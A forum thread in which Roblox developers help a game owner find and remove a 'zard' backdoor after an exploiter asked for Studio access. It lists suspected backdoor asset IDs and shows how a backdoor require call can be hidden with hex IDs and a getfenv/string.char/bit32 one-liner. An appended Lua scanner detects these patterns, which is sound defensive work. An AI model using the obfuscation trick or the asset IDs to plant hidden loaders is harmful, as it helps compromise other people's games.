Zard infection?

So like, an exploiter joined my game and started ruining it. He was saying my game is infected with something called “zard” and that he needs studio access in order to remove it because my game keeps “flooding the logs”. The thing is, he seems awfully intent on getting studio access and not very annoyed about his logs being flooded. Does anyone know anything about “zard” or how to fix infections?
(Side note: I have no idea how to categorize this, so I put it under scripting support because I think it's technically a script.)

I believe zard is a backdoor exploit, look for a require(then some numbers).
It's server-sided.

You can remove it yourself, don't give em access.

Oh, I already know not to give access.

  1. Give links to all your plugins, it might be from one of them.
  2. Check through all free models with scripts or module scripts for the following signs:
    require(number)
    getfenv()
    oddly formatted scripts, usually all on one or 2 lines that are very long.

That’s kinda creepy. Just ignore em or ban em.
Search “Script” in the explorer and delete suspicious scripts.

I know as a fact zard uses require.

To add on to what others above are saying:

To search for text in all scripts in your game, go to View > Find All / Replace All and search for “require” and hit enter. Look for anything suspicious and you can probably ignore anything in CoreGui.

zard uses require(6972600074) I believe

4698038381
or
343254562
or
359948692

2nd one is a backdoor. I read comments on it, I found the model for it.

wait the second one??
that was from a model from EndorsedModel

That might be true, but I would not recommend doing a direct search like that normally because they could easily just obfuscate the asset ID to hide it from searches, for example:

require(0x19F996F0A)

would be the same as

require(6972600074)

Better to be safe and skim through all mentions of require if you know for a fact there is a backdoor virus somewhere in the game.

Might be the first one then, because the last one is for Adonis admin I think.

everyone run ITS IN THE TREES!
but srsly the obfuscated version is in the trees

thanks for the help btw. I will not be sus of any scripts inside of trees
especially ones named “WELD.”

The scary thing is that my obfuscation example is also pretty basic. You can use some string.char wizardry to completely hide “require” from appearing in a search, but you have to use “getfenv”. You can also throw some binary manipulation in there by using the bit32 library:

--this black magic code:
getfenv()[string.char(114, 101, 113, 117, 105, 114, 101)](bit32.bor(bit32.lshift(0x9F99, 16), 0x6F0A)+0x100000000)

--is the same as this:
require(6972600074)

So also make sure to search for “getfenv” in Find All when looking for a virus backdoor script in your game, as well as “require”. There are ways to hide this stuff very deep in the trees.

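The checks suggested across this thread (a require with a numeric ID, getfenv, string.char, bit32, and very long lines), combined into one scan for the Studio command bar. This is an added example, not code from any poster; the scanSource name and the 300-character cutoff are assumptions made for the illustration.

```lua
-- Added example: paste into the Roblox Studio command bar.
local LONG_LINE = 300 -- assumed cutoff for a "very long" line
-- Names the thread says can be used to hide a require call from a text search.
local NAMES = { "getfenv", "string.char", "bit32" }

-- scanSource (hypothetical helper): returns a list of findings for one script.
local function scanSource(source)
	local findings = {}
	local lineNo = 0
	for line in (source .. "\n"):gmatch("(.-)\r?\n") do
		lineNo += 1
		-- require(<literal>): tonumber() folds decimal and 0x hex spellings
		-- into the same asset ID, so both forms report the same number.
		-- require(script.Module) and similar are skipped (tonumber gives nil).
		for arg in line:gmatch("require%s*%(%s*(%w+)%s*%)") do
			local id = tonumber(arg)
			if id then
				table.insert(findings, "line " .. lineNo .. ": require of asset ID "
					.. tostring(id) .. " (written as " .. arg .. ")")
			end
		end
		for _, name in ipairs(NAMES) do
			if line:find(name, 1, true) then -- plain substring match
				table.insert(findings, "line " .. lineNo .. ": uses " .. name)
			end
		end
		if #line > LONG_LINE then
			table.insert(findings, "line " .. lineNo .. ": " .. #line .. " characters long")
		end
	end
	return findings
end

for _, inst in ipairs(game:GetDescendants()) do
	-- Some instances or their Source cannot be read, so do both under pcall.
	local ok, source = pcall(function()
		return inst:IsA("LuaSourceContainer") and inst.Source or nil
	end)
	if ok and type(source) == "string" then
		for _, finding in ipairs(scanSource(source)) do
			print(inst:GetFullName() .. " -> " .. finding)
		end
	end
end
```

Each printed line is only a place to read by hand; ordinary scripts can call require with an ID too.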

why have u sent this publicly
we are all doomed
